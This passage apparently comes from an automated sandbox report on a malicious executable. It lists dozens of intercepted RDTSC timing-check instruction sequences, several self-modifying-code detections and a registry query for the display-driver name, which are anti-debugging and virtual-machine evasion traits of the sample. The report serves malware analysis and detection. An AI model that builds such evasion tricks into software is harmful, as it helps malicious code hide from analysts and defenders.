                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13283F3 second address: 13283F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1328548 second address: 1328554 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1328554 second address: 132857E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2CCC4B427h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jnl 00007FC2CCC4B416h 0x00000012 pop esi 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132857E second address: 132858D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC2CCD28606h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132858D second address: 1328591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1328591 second address: 13285A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC2CCD2860Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13285A9 second address: 13285AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1328B9E second address: 1328BAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jg 00007FC2CCD28606h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1328BAA second address: 1328BAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D153E second address: 12D1565 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FC2CCD28619h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D1565 second address: 12D1569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D160E second address: 12D1620 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FC2CCD28606h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D1620 second address: 12D1631 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2CCC4B41Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1329810 second address: 132983E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2CCD28616h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c jmp 00007FC2CCD28610h 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132983E second address: 132984F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FC2CCC4B416h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132D106 second address: 132D11E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2CCD28613h 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132D28F second address: 132D2C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC2CCC4B421h 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007FC2CCC4B426h 0x0000000f popad 0x00000010 je 00007FC2CCC4B41Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132D6C4 second address: 132D6FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FC2CCD28619h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC2CCD28614h 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132D6FD second address: 132D706 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132D706 second address: 132D70C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1334471 second address: 133447E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007FC2CCC4B416h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133447E second address: 1334488 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1334A1D second address: 1334A24 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1334CCC second address: 1334CD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1334CD2 second address: 1334CD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1335568 second address: 133557E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007FC2CCD2860Bh 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1335E42 second address: 1335E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1335E46 second address: 1335E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1335E4C second address: 1335E54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1335E54 second address: 1335E5E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC2CCD28606h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1335E5E second address: 1335E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007FC2CCC4B422h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1335E80 second address: 1335E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133B835 second address: 133B85E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC2CCC4B432h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134250C second address: 1342514 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1342514 second address: 1342518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134192D second address: 1341931 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1341C35 second address: 1341C3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1341C3E second address: 1341C42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1341C42 second address: 1341C53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 pushad 0x00000009 jno 00007FC2CCC4B416h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1341DBB second address: 1341DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FC2CCD2860Ah 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1341DCA second address: 1341DD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FC2CCC4B416h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1341DD4 second address: 1341DD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1341DD8 second address: 1341DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1341DE2 second address: 1341DE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134207B second address: 134207F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1342246 second address: 1342252 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FC2CCD28606h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134AE9E second address: 134AEA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134AEA4 second address: 134AECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC2CCD28610h 0x0000000c jmp 00007FC2CCD28612h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134966B second address: 1349671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134995A second address: 134995E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134995E second address: 1349962 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1349C33 second address: 1349C42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 js 00007FC2CCD28606h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135140A second address: 1351419 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC2CCC4B416h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1351419 second address: 1351426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135FC7D second address: 135FC82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135FC82 second address: 135FC8D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop esi 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12890EE second address: 12890F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1364669 second address: 136466F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136466F second address: 1364679 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC2CCC4B416h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13694DA second address: 13694DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13694DE second address: 13694E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136B901 second address: 136B93E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FC2CCD28611h 0x0000000c popad 0x0000000d jmp 00007FC2CCD28614h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC2CCD2860Ch 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136B93E second address: 136B944 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137AC9F second address: 137ACA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137ACA3 second address: 137ACB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2CCC4B41Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137ACB6 second address: 137ACEB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FC2CCD28615h 0x00000008 jne 00007FC2CCD28606h 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jl 00007FC2CCD28616h 0x00000019 jmp 00007FC2CCD2860Ah 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137ACEB second address: 137ACEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1379762 second address: 1379768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1379A09 second address: 1379A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1379A0D second address: 1379A11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1379A11 second address: 1379A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1379B8E second address: 1379BA0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FC2CCD2860Ch 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1379BA0 second address: 1379BC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2CCC4B425h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC2CCC4B41Dh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1379BC8 second address: 1379BD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FC2CCD28606h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1379EA0 second address: 1379EAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FC2CCC4B416h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137C29D second address: 137C2A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137C2A8 second address: 137C2AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13804D2 second address: 13804F0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FC2CCD28614h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13804F0 second address: 1380511 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC2CCC4B416h 0x00000008 jmp 00007FC2CCC4B427h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139EF9D second address: 139EFAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 ja 00007FC2CCD28606h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AFB76 second address: 13AFB7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AFB7A second address: 13AFB7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AFB7E second address: 13AFB92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FC2CCC4B416h 0x0000000e jns 00007FC2CCC4B416h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AFB92 second address: 13AFBAE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jbe 00007FC2CCD28606h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d jg 00007FC2CCD28626h 0x00000013 pushad 0x00000014 jne 00007FC2CCD28606h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AFBAE second address: 13AFBC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a jnp 00007FC2CCC4B416h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AFF94 second address: 13AFF9E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC2CCD28606h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AFF9E second address: 13AFFAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AFFAA second address: 13AFFBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FC2CCD28606h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AFFBA second address: 13AFFBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B00EF second address: 13B00F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B33BB second address: 13B33D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 jmp 00007FC2CCC4B422h 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B628C second address: 13B62A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2CCD28610h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B62A6 second address: 13B62AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B7CBB second address: 13B7CBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B780E second address: 13B782F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2CCC4B424h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jo 00007FC2CCC4B416h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52302DE second address: 52302E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52302E2 second address: 52302E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52302E8 second address: 5230323 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edi 0x00000005 mov ax, 9CDDh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FC2CCD28614h 0x00000016 xor cx, 3668h 0x0000001b jmp 00007FC2CCD2860Bh 0x00000020 popfd 0x00000021 mov ax, 745Fh 0x00000025 popad 0x00000026 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 112192F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 12C5DF7 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 12F3752 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 12D0945 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1352CBB instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
